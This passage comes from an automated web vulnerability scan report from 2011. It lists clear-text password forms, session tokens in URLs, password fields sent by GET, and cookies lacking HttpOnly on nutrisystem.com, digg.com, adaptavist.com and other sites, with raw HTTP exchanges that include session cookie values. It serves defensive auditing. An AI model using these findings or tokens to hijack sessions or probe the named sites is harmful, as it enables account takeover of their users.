Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
       <meta http-equiv="P3P"
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/shop/includes/order_now_v1.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.34. http://www.nutrisystem.com/jsps_hmr/success_stories/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/success_stories/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/success_stories/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:19:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="P3P" content='p
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/success_stories/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.35. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/terms/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/terms/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/terms/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.36. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tools_community/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/tools_community/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/tools_community/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.37. http://www.nutrisystem.com/jsps_hmr/user/login.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/user/login.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/user/login.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:20:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/user/login.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

4. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://www.adaptavist.com/display/~mgibson/Versions  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /display/~mgibson/Versions HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:56:47 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804608030
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=B0F32C98EB713B86B6593431B27FFC5E; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 18140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout
...[SNIP]...
<td class="logotd" valign="middle"><a href="/display/ADAPTAVIST?atl_token=LeXEkc_9rY" class="logo" rel=" home"><span class="image-wrap" style="">
...[SNIP]...
<li class="menuitem first"><a href="/display/~mgibson/Versions?atl_token=LeXEkc_9rY&amp;decorator=printable" class="first" rel="nofollow">Print</a></li>
<li class="menuitem "><a href="/login.action?os_destination=%2Fdisplay%2F~mgibson%2FVersions&amp;atl_token=LeXEkc_9rY" rel="nofollow">Sign in</a>
...[SNIP]...
<li class="menuitem "><a href="/signup.action?atl_token=LeXEkc_9rY" rel="nofollow">Create an account</a>
...[SNIP]...
<li class="menuitem zone-company"><a href="/display/ADAPTAVIST/Home?atl_token=LeXEkc_9rY" class="zone-company" rel="">Company</a>
...[SNIP]...
<li class="menuitem zone-products"><a href="/display/Products/Home?atl_token=LeXEkc_9rY" class="zone-products" rel="">Products</a>
...[SNIP]...
<li class="menuitem zone-services"><a href="/display/Services/Home?atl_token=LeXEkc_9rY" class="zone-services" rel="">Services</a>
...[SNIP]...
1/_/download/resources/com.adaptavist.confluence.themes.sitebuilder:sitebuilder/icons/id_card.png" style="width:16px;height:16px;vertical-align:absmiddle;" class="nopie" title="id_card" alt="id_card"/><a href="/login.action?os_destination=%2Fdisplay%2F~mgibson%2FVersions&amp;atl_token=LeXEkc_9rY" class="zone-profile" rel="nofollow">Profile</a>
...[SNIP]...
/1/1/_/download/resources/com.adaptavist.confluence.themes.sitebuilder:sitebuilder/icons/wrench.png" style="width:16px;height:16px;vertical-align:absmiddle;" class="nopie" title="wrench" alt="wrench"/><a href="/dashboard.action?atl_token=LeXEkc_9rY" class="zone-global" rel="">Tools</a>
...[SNIP]...
<li class="menuitem section-dashboard"><a href="/dashboard.action?atl_token=LeXEkc_9rY" class="section-dashboard" rel="">Dashboard</a>
...[SNIP]...
<li class="menuitem section-labels"><a href="/labels/listlabels-heatmap.action?atl_token=LeXEkc_9rY" class="section-labels" rel="">Tags/Labels</a>
...[SNIP]...
<li class="menuitem section-rss"><a href="/dashboard/configurerssfeed.action?atl_token=LeXEkc_9rY" class="section-rss" rel="">Feeds</a></li>
<li class="menuitem section-search"><a href="/dosearchsite.action?atl_token=LeXEkc_9rY" class="section-search" rel="nofollow">Search</a>
...[SNIP]...
<li class="menuitem "><a href="/display/ADAPTAVIST/Company?atl_token=LeXEkc_9rY" rel="">Company</a></li>
<li class="menuitem "><a href="/display/Products/Home?atl_token=LeXEkc_9rY" rel="">Products</a>
...[SNIP]...
<li class="menuitem "><a href="/display/Services/Home?atl_token=LeXEkc_9rY" rel="">Services</a>
...[SNIP]...
<li class="menuitem "><a href="/display/ADAPTAVIST/Contact+Us?atl_token=LeXEkc_9rY" rel="">Contact Us</a>
...[SNIP]...
<li class="menuitem "><a href="/display/ADAPTAVIST/Privacy+Policy?atl_token=LeXEkc_9rY" rel="">Privacy</a></li>
<li class="menuitem "><a href="/display/ADAPTAVIST/Legal?atl_token=LeXEkc_9rY" rel="">Legal</a>
...[SNIP]...

4.2. http://www.nutrisystem.com/webmedia1810  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.nutrisystem.com
Path:   /webmedia1810

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /webmedia1810;jsessionid=62633F40AB8B1C4C09BB5823A0564C69?_requestid=566196 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://www.nutrisystem.com/jsps_hmr/common/assignCampaign.jsp?URI=/webmedia1810&queryString=_requestid%3D566196&errorRedirect=true&siteId=Nutrisystem&_requestid=566196
Content-Type: text/html
Date: Wed, 12 Jan 2011 02:48:27 GMT
Content-Length: 0


5. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


5.1. http://digg.com/search  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23348 10.2.129.156
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7669


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

5.2. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:31:10 GMT; path=/; domain=digg.com
Set-Cookie: d=3b5b9a2fff23b5034f72836f0c1564901f30b745ea1e1762c0d50e4b67aefbde; expires=Mon, 11-Jan-2021 13:38:50 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24431 10.2.129.145
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 50 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://forum.jquery.com/topic/appendto-behaviour  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://forum.jquery.com
Path:   /topic/appendto-behaviour

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /topic/appendto-behaviour HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=391edf0f-c405-4597-af49-431938c3e0c1; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=46488B795B88003DEAC6C0965159E397; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 12 Jan 2011 03:34:16 GMT
Server: Apache-Coyote/1.1
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...

6.2. http://www.adaptavist.com/display/~mgibson/Versions  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.adaptavist.com
Path:   /display/~mgibson/Versions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/~mgibson/Versions HTTP/1.1
Host: www.adaptavist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 03:56:47 GMT
Server: Apache-Coyote/1.1
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1294804608030
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=B0F32C98EB713B86B6593431B27FFC5E; Path=/
Via: 1.1 adaptavist.wiki.adaptavist.com
Vary: Accept-Encoding
Connection: close
Content-Length: 18140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout
...[SNIP]...

6.3. http://www.brothercake.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.brothercake.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.brothercake.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:59:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-control: private
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=a6848a1f4b56dcf93dd73df0f331cf18; path=/
Connection: close
Content-Type: text/html
Content-Length: 20181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta http
...[SNIP]...

6.4. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tracking/click.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/tracking/click.jsp?iid=29521&rURL=/webmedia1810 HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; Path=/
Set-Cookie: ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; Path=/
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242836360; Expires=Thu, 12-Jan-2012 02:48:26 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; Expires=Thu, 12-Jan-2012 02:48:26 GMT; Path=/
Location: http://www.nutrisystem.com/webmedia1810;jsessionid=62633F40AB8B1C4C09BB5823A0564C69?_requestid=566196
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 02:48:27 GMT
Set-Cookie: BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; path=/
Content-Length: 0


6.5. http://www.quantcast.com/p-10v8JLtUuOYqQ  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-10v8JLtUuOYqQ

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p-10v8JLtUuOYqQ HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Wed, 12 Jan 2011 04:09:07 GMT
Expires: Mon, 10 Jan 2011 16:09:07 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=1|69|1294805347864|0|NOTSET; Expires=Fri, 04-Jan-2041 04:09:07 GMT; Path=/
Set-Cookie: JSESSIONID=63520446D9680846B82F0D17BE1FDC50; Path=/
